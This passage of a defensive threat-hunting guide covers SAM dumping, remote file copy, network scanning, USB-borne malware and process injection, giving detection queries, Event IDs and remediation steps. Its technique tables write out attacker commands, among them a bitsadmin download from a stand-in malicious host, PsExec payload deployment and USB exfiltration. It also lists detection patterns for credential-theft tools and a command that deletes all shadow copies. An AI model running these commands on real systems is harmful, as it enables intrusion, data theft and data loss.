ProcessCommandLine contains "save" | where ProcessCommandLine contains "SAM" | project Timestamp, DeviceName, ProcessCommandLine, AccountName ``` **๐Ÿ•ต๏ธ Detect Shadow Copy Abuse** ```kusto DeviceProcessEvents | where FileName == "vssadmin.exe" | where ProcessCommandLine contains "create shadow" | project Timestamp, DeviceName, ProcessCommandLine, AccountName ``` **๐Ÿ•ต๏ธ Identify Mimikatz Execution** ```kusto DeviceProcessEvents | where FileName contains "mimikatz.exe" or ProcessCommandLine contains "lsadump::sam" | project Timestamp, DeviceName, ProcessCommandLine, AccountName ``` **๐Ÿ•ต๏ธ Remote SAM Dumping with Impacket** ```kusto DeviceNetworkEvents | where RemoteIP != "127.0.0.1" | where InitiatingProcessCommandLine contains "secretsdump.py" | project Timestamp, DeviceName, RemoteIP, InitiatingProcessCommandLine ``` *** #### ๐Ÿ“Š **Event Viewer Logs** | **Event ID** | **Description** | | ------------ | ------------------------------------------------------------ | | **4663** | An attempt was made to access an object (SAM file access). | | **4688** | A new process was created (e.g., `reg.exe`, `mimikatz.exe`). | | **4624** | Account logon (especially administrative accounts). | | **4724** | An attempt was made to reset an account's password. | | **5145** | A network share object was accessed. | **๐Ÿ“Œ Focus on Event ID 4663:** * Object Access attempts for `HKLM\SAM` or `C:\Windows\System32\config\SAM`. **๐Ÿ“Œ Event ID 4688:** * Look for suspicious processes: * `reg.exe` * `vssadmin.exe` * `mimikatz.exe` *** ### ๐Ÿ•ต๏ธ **3. Investigation Techniques** #### 1๏ธโƒฃ **Identify Registry Export Commands** * Search for SAM exports: ```powershell Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object { $_.Message -like "*reg save HKLM\SAM*" } ``` *** #### 2๏ธโƒฃ **Inspect Shadow Copies** * List all shadow copies: ```powershell vssadmin list shadows ``` * Look for unusual creation timestamps. *** #### 3๏ธโƒฃ **Analyze Active Processes** * Identify active processes accessing SAM files: ```powershell Get-Process -Name reg, vssadmin, mimikatz -IncludeUserName ``` *** #### 4๏ธโƒฃ **Trace Malicious Tools** * Search common tool artifacts: ```powershell Get-ChildItem -Path "C:\Temp", "C:\Users\Public" -Recurse | Where-Object { $_.Name -match "mimikatz|secretsdump" } ``` *** #### 5๏ธโƒฃ **Check for Remote Credential Dumps** * Inspect network logs for suspicious remote connections: ```powershell Get-NetTCPConnection | Where-Object { $_.RemoteAddress -notlike "192.168.*" } ``` *** ### ๐Ÿ”ง **4. Remediation Steps** #### ๐Ÿ“Œ **1. Change Local Account Passwords** * Immediately reset local admin passwords: ```powershell net user Administrator NewP@ssw0rd! ``` #### ๐Ÿ“Œ **2. Remove Malicious Shadow Copies** ```powershell vssadmin delete shadows /for=C: /all /quiet ``` #### ๐Ÿ“Œ **3. Block Tools (Mimikatz, Impacket)** * Use **AppLocker** or **WDAC** to block these tools. #### ๐Ÿ“Œ **4. Review Local Admin Group Memberships** ```powershell net localgroup Administrators ``` #### ๐Ÿ“Œ **5. Enable Logging and Auditing** * Ensure **Event IDs 4663, 4688, and 4624** are monitored. #### ๐Ÿ“Œ **6. Perform Full Antivirus Scan** ```powershell Start-MpScan -ScanType FullScan ``` *** ### ๐Ÿ›ก๏ธ **5. Prevention Steps** 1. **Enable LSASS Protection:** ```powershell reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f ``` 2. **Monitor Access to SAM Files:** * Enable auditing on: * `C:\Windows\System32\config\SAM` * `HKLM\SAM` 3. **Restrict Registry Access:** * Limit local admin privileges. 4. **Block Tool Execution:** * Use **Application Control Policies (AppLocker)** to block `mimikatz.exe`, `secretsdump.py`. 5. **Use Credential Guard:** * Enable **Windows Defender Credential Guard**. 6. **Limit Local Admin Accounts:** * Disable unused local admin accounts. *** ### ๐Ÿง  **6. Key Takeaways** * **SAM Database is Critical:** Protect it with auditing and access control. * **Monitor Registry Access:** Look for `reg save HKLM\SAM`. * **Detect Shadow Copy Abuse:** Monitor `vssadmin` commands. * **Credential Guard is Essential:** Prevent access to LSASS and SAM hashes. * **Block Known Tools:** Prevent execution of `mimikatz.exe` and `secretsdump.py`. *** ## ๐Ÿšจ **Remote File Copy: Advanced Threat Analysis** ### ๐Ÿ” **1. Attack Breakdown** #### ๐Ÿ“ **What is Remote File Copy?** * **Remote File Copy** is an adversarial tactic where attackers **transfer files between systems** over a network to: * Deploy **malicious payloads**. * Exfiltrate **sensitive data**. * Move **toolkits** or **scripts** for post-exploitation activities. #### ๐Ÿ“‘ **Why Attackers Use Remote File Copy?** * **Payload Deployment:** Transfer malware, tools, or scripts for persistence or lateral movement. * **Data Exfiltration:** Steal confidential files or credentials. * **Stealth:** Use native tools (e.g., `xcopy`, `robocopy`, `scp`) to evade detection. * **Remote Control:** Set up additional footholds on other systems. #### ๐Ÿ“Œ **Common Techniques for Remote File Copy** | **Technique** | **Tool/Command Example** | **Purpose** | | ------------------------------- | ---------------------------------------------------------------- | ---------------------------------------------------- | | **SMB Copy** | `copy \\target\C$\Temp\payload.exe` | Copy files via SMB | | **PSExec (Sysinternals)** | `psexec \\target -c payload.exe` | Deploy payload using PsExec | | **PowerShell Copy** | `Copy-Item -Path .\payload.exe -Destination \\target\C$\Temp` | Copy via PowerShell | | **RDP File Drop** | File transfer using Remote Desktop | Upload malicious files | | **FTP Transfer** | `ftp ` | Transfer files via FTP | | **SCP (Secure Copy Protocol)** | `scp file.txt user@remote:/tmp/` | Transfer files securely | | **WinRM (PowerShell Remoting)** | `Invoke-Command -ComputerName target -ScriptBlock { Copy-Item }` | Copy files using WinRM | | **BITSAdmin Abuse** | `bitsadmin /transfer malware http://malicious.com/payload.exe` | Download via Background Intelligent Transfer Service | *** ### ๐Ÿ›ก๏ธ **2. Detection Techniques** #### ๐Ÿ“Š **Manual Inspection with PowerShell** **๐Ÿ•ต๏ธ Check Recent File Transfers via SMB** ```powershell Get-SmbSession ``` * Look for **unusual remote sessions**. **๐Ÿ•ต๏ธ Review PowerShell File Copy History** ```powershell Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} | Where-Object { $_.Message -like "*Copy-Item*" } ``` **๐Ÿ•ต๏ธ Identify Recent Remote Connections** ```powershell Get-NetTCPConnection | Where-Object { $_.RemoteAddress -notlike "192.168.*" } ``` **๐Ÿ•ต๏ธ Check Remote Desktop File Transfers** * Review **RDP logs** at: ``` Event Viewer โ†’ Applications and Services Logs โ†’ Microsoft โ†’ Windows โ†’ TerminalServices-LocalSessionManager ``` *** #### ๐Ÿ“Š **Microsoft Defender for Endpoint (MDE) Query (KQL)** **๐Ÿ•ต๏ธ Detect SMB File Copy Activity** ```kusto DeviceFileEvents | where ActionType == "FileCreated" | where InitiatingProcessFileName in~ ("cmd.exe", "powershell.exe", "robocopy.exe", "xcopy.exe", "psexec.exe") | where FolderPath startswith "\\" | project Timestamp, DeviceName, FileName, FolderPath, AccountName, InitiatingProcessCommandLine ``` **๐Ÿ•ต๏ธ Detect FTP or SCP Commands** ```kusto DeviceProcessEvents | where ProcessCommandLine contains "ftp" or ProcessCommandLine contains "scp" | project Timestamp, DeviceName, ProcessCommandLine, AccountName ``` **๐Ÿ•ต๏ธ Monitor PowerShell Remote Copy Attempts** ```kusto DeviceProcessEvents | where FileName == "powershell.exe" | where ProcessCommandLine contains "Copy-Item" or ProcessCommandLine contains "\\" | project Timestamp, DeviceName, ProcessCommandLine, AccountName ``` **๐Ÿ•ต๏ธ Detect BITSAdmin Abuse** ```kusto DeviceProcessEvents | where FileName == "bitsadmin.exe" | where ProcessCommandLine contains "/transfer" | project Timestamp, DeviceName, ProcessCommandLine, AccountName ``` **๐Ÿ•ต๏ธ Identify Unusual Remote Sessions** ```kusto DeviceNetworkEvents | where RemotePort == 445 or RemotePort == 3389 | where InitiatingProcessFileName in~ ("cmd.exe", "powershell.exe") | project Timestamp, DeviceName, RemoteIP, RemotePort, InitiatingProcessCommandLine, AccountName ``` *** #### ๐Ÿ“Š **Event Viewer Logs** | **Event ID** | **Description** | | ------------ | ----------------------------------------------------- | | **5145** | A network share object was accessed. | | **4663** | Object access attempt (file copy attempt). | | **4688** | A new process was created. | | **4104** | PowerShell Script Block Logging (Copy-Item commands). | | **7045** | A new service was installed (via PsExec). | **๐Ÿ“Œ Focus on Event ID 5145:** * Look for file copy activity over SMB. * Monitor logs for `\\`, `UNC paths`, or abnormal accounts. **๐Ÿ“Œ Focus on Event ID 4688:** * Identify suspicious commands using: * `robocopy.exe` * `xcopy.exe` * `psexec.exe` *** ### ๐Ÿ•ต๏ธ **3. Investigation Techniques** #### 1๏ธโƒฃ **Inspect SMB Sessions** * List current SMB connections: ```powershell Get-SmbSession | Format-Table ``` *** #### 2๏ธโƒฃ **Trace Command-Line Activity** * Search for file copy commands: ```powershell Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object { $_.Message -like "*Copy-Item*" } ``` *** #### 3๏ธโƒฃ **Check BITSAdmin Transfers** * Review current BITS jobs: ```powershell bitsadmin /list /allusers /verbose ``` *** #### 4๏ธโƒฃ **Inspect RDP Session Logs** * Review file transfers via RDP logs: ```powershell Get-WinEvent -LogName "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" ``` *** #### 5๏ธโƒฃ **Check FTP or SCP Activity** * Look for FTP logs in: ``` C:\Windows\System32\LogFiles\FTPSVC2\ ``` *** ### ๐Ÿ”ง **4. Remediation Steps** #### ๐Ÿ“Œ **1. Terminate Malicious Connections** ```powershell Stop-Process -Name "powershell" -Force Stop-Process -Name "psexec" -Force ``` #### ๐Ÿ“Œ **2. Disable Suspicious SMB Sessions** ```powershell Close-SmbSession -SessionId ``` #### ๐Ÿ“Œ **3. Remove Malicious BITS Jobs** ```powershell bitsadmin /reset /allusers ``` #### ๐Ÿ“Œ **4. Quarantine Malicious Files** ```powershell Move-Item -Path "C:\Temp\payload.exe" -Destination "C:\Quarantine" ``` #### ๐Ÿ“Œ **5. Block Known Tools via AppLocker** ```powershell New-AppLockerPolicy -RuleType Deny -Path "C:\Windows\System32\psexec.exe" ``` #### ๐Ÿ“Œ **6. Perform Full Antivirus Scan** ```powershell Start-MpScan -ScanType FullScan ``` *** ### ๐Ÿ›ก๏ธ **5. Prevention Steps** 1. **Disable SMB v1:** ```powershell Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol ``` 2. **Limit Remote Access Tools:** * Restrict `psexec.exe`, `robocopy.exe`, `xcopy.exe`. 3. **Enable BITS Logging:** * Monitor BITS jobs via Windows Event Logs. 4. **Enable PowerShell Logging:** ```powershell Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 ``` 5. **Use Network Segmentation:** * Restrict file-sharing access to authorized systems. 6. **Enable SIEM Alerts:** * Create alerts for commands like `copy`, `scp`, `robocopy`, and `bitsadmin`. *** ### ๐Ÿง  **6. Key Takeaways** * **Native Tools Are Dangerous:** Attackers often use legitimate tools (`xcopy`, `robocopy`) for malicious purposes. * **Monitor SMB and FTP Activity:** Look for unauthorized file transfers. * **Enable Script Block Logging:** Ensure `PowerShell` and `BITS` commands are logged. * **Restrict File Sharing Permissions:** Use least privilege for network shares. *** ## ๐Ÿšจ **Network Service Scanning** *** ### ๐Ÿ” **1. Attack Breakdown** #### ๐Ÿ“ **What is Network Service Scanning?** * **Network Service Scanning** is the process where attackers **probe network devices, servers, or endpoints** to identify **open ports, running services, and vulnerabilities**. * Common goals include: * **Identifying Targets:** Find exploitable systems and services. * **Mapping the Network Topology:** Understand the structure and key services. * **Finding Weak Services:** Detect outdated or misconfigured services. *** #### ๐Ÿ“‘ **Why Attackers Use Network Service Scanning?** * **Initial Reconnaissance:** Build a map of potential entry points. * **Vulnerability Detection:** Find exploitable services. * **Credential Spraying:** Identify systems where default credentials may still work. * **Evasion Planning:** Identify security controls, firewalls, and intrusion detection systems. *** #### ๐Ÿ“Œ **Common Tools Used for Network Scanning** | **Tool** | **Purpose** | **Command Example** | | -------------- | ------------------------------ | ------------------------------------------ | | **Nmap** | Port & service scanning | `nmap -sV -p 1-65535 ` | | **Masscan** | High-speed port scanning | `masscan -p1-65535 ` | | **Netcat** | Port probing | `nc -zv 80` | | **ZMap** | Internet-scale scanning | `zmap -p 80 ` | | **Shodan API** | Search exposed systems | `shodan search port:22` | | **Metasploit** | Service vulnerability scanning | `msfconsole -x "use scanner/portscan/tcp"` | *** #### ๐Ÿ“Š **Common Techniques for Network Scanning** | **Technique** | **Description** | **Example Command** | | ----------------------------- | ---------------------------------------- | ---------------------- | | **TCP Connect Scan** | Check TCP connection to each port. | `nmap -sT ` | | **Stealth Scan (SYN Scan)** | Evade logging by sending SYN packets. | `nmap -sS ` | | **UDP Scan** | Scan UDP services. | `nmap -sU ` | | **Service Version Detection** | Identify software versions. | `nmap -sV ` | | **OS Detection** | Identify the OS type and version. | `nmap -O ` | | **Banner Grabbing** | Extract server information from banners. | `nc 80` | | **SNMP Scanning** | Identify devices using SNMP. | `onesixtyone ` | *** ### ๐Ÿ›ก๏ธ **2. Detection Techniques** #### ๐Ÿ“Š **Manual Inspection with PowerShell** **๐Ÿ•ต๏ธ Review Firewall Logs for Scan Patterns** ```powershell Get-WinEvent -LogName Security -FilterXPath "*[System[EventID=5156]]" ``` * Look for repeated connection attempts from a single IP across multiple ports. *** **๐Ÿ•ต๏ธ Check Failed Authentication Attempts** ```powershell Get-EventLog -LogName Security -InstanceId 4625 ``` * Multiple failed login attempts on different services may indicate scanning. *** **๐Ÿ•ต๏ธ Monitor for Suspicious Connections** ```powershell Get-NetTCPConnection | Where-Object { $_.State -eq "Established" } | Select-Object LocalAddress, RemoteAddress, LocalPort, RemotePort ``` * Unusual connections across many ports from a single IP are suspicious. *** #### ๐Ÿ“Š **Microsoft Defender for Endpoint (MDE) Query (KQL)** **๐Ÿ•ต๏ธ Detect Network Scanning Behavior** ```kusto DeviceNetworkEvents | where RemoteIP != "127.0.0.1" | summarize PortCount = dcount(RemotePort) by RemoteIP | where PortCount > 50 | project Timestamp, DeviceName, RemoteIP, PortCount ``` **๐Ÿ•ต๏ธ Identify High Frequency Connections** ```kusto DeviceNetworkEvents | summarize ConnectionCount = count() by RemoteIP, RemotePort | where ConnectionCount > 100 | project Timestamp, DeviceName, RemoteIP, RemotePort, ConnectionCount ``` **๐Ÿ•ต๏ธ Detect Known Scanning Tools** ```kusto DeviceProcessEvents | where FileName in~ ("nmap.exe", "masscan.exe", "zmap.exe", "netcat.exe") | project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName ``` **๐Ÿ•ต๏ธ Look for SYN Scans** ```kusto DeviceNetworkEvents | where Protocol == "TCP" | where InitiatingProcessFileName contains "nmap" | where RemotePort between (1 .. 1024) | summarize ConnectionCount = count() by RemoteIP | where ConnectionCount > 100 ``` **๐Ÿ•ต๏ธ Identify Suspicious UDP Traffic** ```kusto DeviceNetworkEvents | where Protocol == "UDP" | where RemotePort between (1 .. 65535) | summarize ConnectionCount = count() by RemoteIP | where ConnectionCount > 50 ``` *** #### ๐Ÿ“Š **Event Viewer Logs** | **Event ID** | **Description** | | ------------ | --------------------------------- | | **5156** | A network connection was allowed. | | **5152** | A network connection was blocked. | | **4625** | Failed login attempt. | | **4688** | A process was created. | **๐Ÿ“Œ Focus on Event ID 5156:** * Look for repeated allowed connections from a single **Remote IP** to **many different ports**. **๐Ÿ“Œ Focus on Event ID 4688:** * Identify processes like: * `nmap.exe` * `masscan.exe` * `zmap.exe` *** ### ๐Ÿ•ต๏ธ **3. Investigation Techniques** #### 1๏ธโƒฃ **Trace the Source IP** * Identify the attackerโ€™s IP address: ```powershell netstat -ano | findstr ``` *** #### 2๏ธโƒฃ **Inspect Command-Line History** * Look for scanning tool execution: ```powershell Get-History | Where-Object { $_.CommandLine -match "nmap|masscan|netcat" } ``` *** #### 3๏ธโƒฃ **Check Suspicious Processes** ```powershell Get-Process -Name nmap, masscan, zmap ``` *** #### 4๏ธโƒฃ **Inspect Firewall Logs** * Review blocked connection attempts: ```powershell Get-NetFirewallRule -Name *scan* ``` *** #### 5๏ธโƒฃ **Analyze Network Flows** * Capture network packets: ```powershell Start-Process -FilePath "tcpdump" -ArgumentList "-i eth0 -nn" ``` *** ### ๐Ÿ”ง **4. Remediation Steps** #### ๐Ÿ“Œ **1. Block Suspicious IP Addresses** ```powershell New-NetFirewallRule -DisplayName "Block Suspicious Scanner" -Direction Inbound -RemoteAddress -Action Block ``` #### ๐Ÿ“Œ **2. Disable Unused Services and Ports** ```powershell Disable-NetAdapterBinding -Name Ethernet -ComponentID ms_server ``` #### ๐Ÿ“Œ **3. Terminate Suspicious Processes** ```powershell Stop-Process -Name "nmap" -Force ``` #### ๐Ÿ“Œ **4. Enable Firewall Logging** ```powershell Set-NetFirewallProfile -Profile Domain,Public,Private -LogAllowed True ``` #### ๐Ÿ“Œ **5. Perform Full Antivirus Scan** ```powershell Start-MpScan -ScanType FullScan ``` *** ### ๐Ÿ›ก๏ธ **5. Prevention Steps** 1. **Enable Intrusion Detection System (IDS):** * Use **Snort** or **Suricata**. 2. **Implement Rate-Limiting:** * Limit the number of connection attempts. 3. **Segment the Network:** * Use VLANs and isolated zones. 4. **Disable Unnecessary Services:** * Close unused ports and disable unnecessary protocols. 5. **Enable Firewall Rules:** * Block unused inbound ports. 6. **Monitor Common Tools:** * Alert on tools like **nmap.exe**, **masscan.exe**, **zmap.exe**. *** ### ๐Ÿง  **6. Key Takeaways** * **Scanning is Often the First Step:** Early detection is critical. * **Monitor Network Traffic:** Look for unusual connection spikes. * **Control Tools:** Block execution of known scanning tools. * **Enable IDS/IPS:** Use network monitoring to detect scans. *** ## ๐Ÿšจ **Replication Through Removable Media: Advanced Threat Analysis** *** ### ๐Ÿ” **1. Attack Breakdown** #### ๐Ÿ“ **What is Replication Through Removable Media?** * **Replication through removable media** occurs when attackers **use USB drives, external hard drives, or other removable storage devices** to **spread malware or exfiltrate data**. * Malware is often **automatically executed** using autorun scripts or hidden malicious files. #### ๐Ÿ“‘ **Why Attackers Use Removable Media?** * **Bypass Network Controls:** No reliance on network connectivity. * **Stealth:** USB drives are less monitored than network transfers. * **Physical Access:** Effective in air-gapped environments. * **Persistence:** Can remain undetected and reinfect systems when reconnected. #### ๐Ÿ“Œ **Common Techniques for USB-Based Replication** | **Technique** | **Description** | **Example Command/Tool** | | -------------------------- | ---------------------------------------------------- | ------------------------------ | | **Autorun Exploitation** | Malware is automatically executed via `autorun.inf`. | `echo [autorun] > autorun.inf` | | **Hidden Malicious Files** | Malware is hidden on the USB drive as system files. | `attrib +s +h malicious.exe` | | **Shortcut Abuse** | Replace folder shortcuts with malicious executables. | `cmd /c start folder.lnk` | | **Payload Delivery** | Malicious payloads transferred manually. | `copy payload.exe F:\` | | **Data Exfiltration** | Sensitive data copied to the removable device. | `xcopy C:\sensitive F:\ /E` | #### ๐Ÿ“Œ **Common Malware Examples** * **USB Rubber Ducky:** Hardware-based key injection. * **BadUSB:** Firmware-based USB attack. * **Stuxnet:** Spread through removable drives. * **Autorun Worms:** Malware exploiting `autorun.inf`. *** ### ๐Ÿ›ก๏ธ **2. Detection Techniques** #### ๐Ÿ“Š **Manual Inspection with PowerShell** **๐Ÿ•ต๏ธ List Attached USB Devices** ```powershell Get-WmiObject -Class Win32_DiskDrive | Where-Object { $_.InterfaceType -eq "USB" } | Select-Object DeviceID, Model, MediaType ``` **๐Ÿ•ต๏ธ Check USB Activity in Logs** ```powershell Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-DriverFrameworks-UserMode/Operational'; Id=2003} ``` **๐Ÿ•ต๏ธ Search for Autorun Files** ```powershell Get-ChildItem -Path "F:\" -Filter "autorun.inf" -Recurse -Force ``` **๐Ÿ•ต๏ธ Identify Recently Created or Modified Files on USB** ```powershell Get-ChildItem -Path "F:\" -Recurse | Where-Object { $_.LastWriteTime -gt (Get-Date).AddHours(-24) } ``` *** #### ๐Ÿ“Š **Microsoft Defender for Endpoint (MDE) Query (KQL)** **๐Ÿ•ต๏ธ Detect USB Device Connections** ```kusto DeviceFileEvents | where FolderPath contains ":\\" | where DeviceName contains "USB" | project Timestamp, DeviceName, FileName, FolderPath, ActionType, AccountName ``` **๐Ÿ•ต๏ธ Identify Autorun Files** ```kusto DeviceFileEvents | where FileName == "autorun.inf" | where ActionType in ("FileCreated", "FileModified") | project Timestamp, DeviceName, FileName, FolderPath, AccountName ``` **๐Ÿ•ต๏ธ Detect Malware Dropped on USB** ```kusto DeviceFileEvents | where FolderPath contains ":\\" | where FileName endswith ".exe" or FileName endswith ".bat" | where ActionType == "FileCreated" | project Timestamp, DeviceName, FileName, FolderPath, AccountName ``` **๐Ÿ•ต๏ธ Detect Exfiltration Activity** ```kusto DeviceFileEvents | where FolderPath contains ":\\" | where ActionType == "FileCopied" | where FileName contains "password" or FileName contains "sensitive" | project Timestamp, DeviceName, FileName, FolderPath, AccountName ``` **๐Ÿ•ต๏ธ Look for Suspicious Processes Executed from USB** ```kusto DeviceProcessEvents | where FolderPath contains ":\\" | where FileName endswith ".exe" | project Timestamp, DeviceName, ProcessCommandLine, FolderPath, AccountName ``` *** #### ๐Ÿ“Š **Event Viewer Logs** | **Event ID** | **Description** | | ------------ | ---------------------------------------------- | | **2003** | USB device connected. | | **4688** | Process creation (malware execution from USB). | | **4663** | Object access attempt (e.g., file copied). | | **4670** | Permissions changed on an object. | | **4656** | Handle to an object was requested. | **๐Ÿ“Œ Focus on Event ID 2003:** * Tracks **USB device connections**. **๐Ÿ“Œ Focus on Event ID 4688:** * Look for processes executed directly from a USB drive (`F:\malicious.exe`). **๐Ÿ“Œ Focus on Event ID 4663:** * Tracks **file access events**. *** ### ๐Ÿ•ต๏ธ **3. Investigation Techniques** #### 1๏ธโƒฃ **Identify USB Device Details** * Check device properties: ```powershell Get-PnpDevice -Class USB ``` *** #### 2๏ธโƒฃ **Review USB Device History** ```powershell Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-DriverFrameworks-UserMode/Operational'; Id=2003} ``` *** #### 3๏ธโƒฃ **Trace Executed Files from USB** * Identify suspicious execution paths: ```powershell Get-EventLog -LogName Security -InstanceId 4688 | Where-Object { $_.Message -like "*:\\*.exe" } ``` *** #### 4๏ธโƒฃ **Check Recent File Transfers** * Look for exfiltration patterns: ```powershell Get-ChildItem -Path "F:\" -Recurse | Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-1) } ``` *** #### 5๏ธโƒฃ **Extract Autorun Configurations** * Inspect `autorun.inf`: ```powershell Get-Content -Path "F:\autorun.inf" ``` *** ### ๐Ÿ”ง **4. Remediation Steps** #### ๐Ÿ“Œ **1. Disable Autorun for Removable Devices** ```powershell reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f ``` #### ๐Ÿ“Œ **2. Quarantine Suspicious Files** ```powershell Move-Item -Path "F:\malicious.exe" -Destination "C:\Quarantine" ``` #### ๐Ÿ“Œ **3. Block Malicious Processes** ```powershell Stop-Process -Name "malicious" -Force ``` #### ๐Ÿ“Œ **4. Remove Suspicious Autorun Files** ```powershell Remove-Item -Path "F:\autorun.inf" ``` #### ๐Ÿ“Œ **5. Perform Full Antivirus Scan** ```powershell Start-MpScan -ScanType FullScan ``` *** ### ๐Ÿ›ก๏ธ **5. Prevention Steps** 1. **Disable Autorun:** * Prevent automatic execution of files from removable devices. 2. **Restrict USB Access:** * Implement policies to restrict USB drive usage. 3. **Enable USB Auditing:** * Enable Event Logs for USB activity. 4. **Use Device Control Solutions:** * Implement tools like **Microsoft Defender Device Control**. 5. **Encrypt Sensitive Data:** * Ensure sensitive data cannot be easily copied to USB devices. 6. **Block Known Malicious Tools:** * Block `autorun.inf` and known malicious file extensions via **AppLocker**. 7. **Educate Users:** * Train users to avoid connecting unknown USB devices. *** ### ๐Ÿง  **6. Key Takeaways** * **USB Drives Are a Threat Vector:** Monitor USB access and file transfers. * **Disable Autorun:** Prevent automatic execution of malicious payloads. * **Audit USB Activity:** Enable detailed logging for USB connections. * **Use Device Control:** Restrict or block USB usage for unauthorized users. * **Educate Employees:** Train them on risks associated with USB drives. *** ## ๐Ÿšจ **Process Injection** *** ### ๐Ÿ” \*\*1. **Attack Breakdown** #### ๐Ÿ“ **What is Process Injection?** * **Process Injection** is a technique used by attackers to **inject malicious code into legitimate processes** to: * **Evade Detection:** Hide within trusted processes (e.g., `explorer.exe`, `svchost.exe`). * **Privilege Escalation:** Execute code with higher privileges. * **Persistence:** Maintain access even after reboots. * **Bypass Security Controls:** Avoid antivirus or endpoint protection detection. #### ๐Ÿ“‘ **Why Attackers Use Process Injection?** * **Stealth:** Operate within trusted processes. * **Access:** Leverage the privileges of the injected process. * **Bypass Controls:** Avoid application whitelisting. * **Persistence:** Maintain presence across sessions. *** #### ๐Ÿ“Œ **Common Techniques for Process Injection** | **Technique** | **Description** | **Tool Example** | | ------------------------------ | ------------------------------------------------ | ----------------------------- | | **DLL Injection** | Inject malicious DLLs into legitimate processes. | `rundll32.exe` | | **Process Hollowing** | Replace a process's memory with malicious code. | `svchost.exe` | | **APC Injection** | Use Asynchronous Procedure Calls for injection. | `Mimikatz` | | **Thread Execution Hijacking** | Hijack an existing thread for malicious code. | `Metasploit` | | **Reflective DLL Injection** | Load DLLs directly into memory. | `Cobalt Strike` | | **Shellcode Injection** | Inject and execute raw shellcode in a process. | `Metasploit`, `Cobalt Strike` | *** #### ๐Ÿ“Š **Common Tools for Process Injection** | **Tool** | **Purpose** | | ------------------ | --------------------------------- | | **Metasploit** | Payload generation and injection | | **Mimikatz** | Credential dumping with injection | | **Cobalt Strike** | Post-exploitation framework | | **PowerSploit** | PowerShell exploitation scripts | | **Process Hacker** | Process analysis and injection | *** ### ๐Ÿ›ก๏ธ **2. Detection Techniques** #### ๐Ÿ“Š **Manual Inspection with PowerShell** **๐Ÿ•ต๏ธ List Suspicious Processes** ```powershell Get-Process | Where-Object { $_.Path -like "*Temp*" } ``` **๐Ÿ•ต๏ธ Check Suspicious DLL Injections** ```powershell Get-Process -Module | Where-Object { $_.ModuleName -like "*.dll" -and $_.FileName -like "*Temp*" } ``` **๐Ÿ•ต๏ธ Inspect Threads in Processes** ```powershell Get-CimInstance Win32_Process | Select-Object ProcessId, Name, CommandLine, ParentProcessId ``` **๐Ÿ•ต๏ธ Check Remote Thread Creation** ```powershell Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object { $_.Message -like "*CreateRemoteThread*" } ``` *** #### ๐Ÿ“Š **Microsoft Defender for Endpoint (MDE) Query (KQL)** **๐Ÿ•ต๏ธ Detect DLL Injection** ```kusto DeviceFileEvents | where FileName endswith ".dll" | where FolderPath contains "Temp" or FolderPath contains "AppData" | project Timestamp, DeviceName, FileName, FolderPath, AccountName, InitiatingProcessCommandLine ``` **๐Ÿ•ต๏ธ Detect Remote Thread Creation** ```kusto DeviceProcessEvents | where ProcessCommandLine contains "CreateRemoteThread" | project Timestamp, DeviceName, ProcessCommandLine, AccountName ``` **๐Ÿ•ต๏ธ Identify Hollowed Processes** ```kusto DeviceProcessEvents | where InitiatingProcessCommandLine contains "svchost.exe" | where ProcessCommandLine contains "explorer.exe" or ProcessCommandLine contains "cmd.exe" | project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessCommandLine, AccountName ``` **๐Ÿ•ต๏ธ Detect Reflective DLL Injection** ```kusto DeviceProcessEvents | where ProcessCommandLine contains "rundll32.exe" | where ProcessCommandLine contains "LoadLibrary" | project Timestamp, DeviceName, ProcessCommandLine, AccountName ``` **๐Ÿ•ต๏ธ Monitor Suspicious Thread Creation** ```kusto DeviceProcessEvents | where InitiatingProcessFileName contains "powershell.exe" or InitiatingProcessFileName contains "cmd.exe" | where ProcessCommandLine contains "VirtualAlloc" or ProcessCommandLine contains "WriteProcessMemory" | project Timestamp, DeviceName, ProcessCommandLine, AccountName ``` *** #### ๐Ÿ“Š **Event Viewer Logs** | **Event ID** | **Description** | | ------------ | ------------------------------------------------ | | **4688** | Process creation (Look for `CreateRemoteThread`) | | **4689** | Process termination | | **4697** | Service installed on a system | | **4720** | An account was created | **๐Ÿ“Œ Focus on Event ID 4688:** * Look for: ```makefile ProcessName: rundll32.exe, svchost.exe, powershell.exe CommandLine: CreateRemoteThread, VirtualAlloc, WriteProcessMemory ``` **๐Ÿ“Œ Focus on Event ID 4697:** * Look for unusual services created with suspicious paths. *** ### ๐Ÿ•ต๏ธ **3. Investigation Techniques** #### 1๏ธโƒฃ **Trace Injected Processes** * Identify suspicious child-parent process relationships: ```powershell Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq } ``` *** #### 2๏ธโƒฃ **Analyze DLL Loading Paths** * Verify DLL paths: ```powershell Get-Process -Module | Where-Object { $_.ModuleName -like "*.dll" } ``` *** #### 3๏ธโƒฃ **Monitor Memory Activity** * Look for unexpected memory allocation: ```powershell Get-Process -Name svchost | Select-Object Handles, NPM, PM, WS ``` *** #### 4๏ธโƒฃ **Check Running Threads** * Identify unusual thread activity: ```powershell Get-Process -Id | Select-Object Threads ``` *** #### 5๏ธโƒฃ **Review Command-Line Activity** * Check for encoded or suspicious PowerShell commands: ```powershell Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Select-String "EncodedCommand" ``` *** ### ๐Ÿ”ง **4. Remediation Steps** #### ๐Ÿ“Œ **1. Kill Malicious Processes** ```powershell Stop-Process -Id -Force ``` #### ๐Ÿ“Œ **2. Quarantine Malicious DLLs** ```powershell Move-Item -Path "C:\Temp\malicious.dll" -Destination "C:\Quarantine" ``` #### 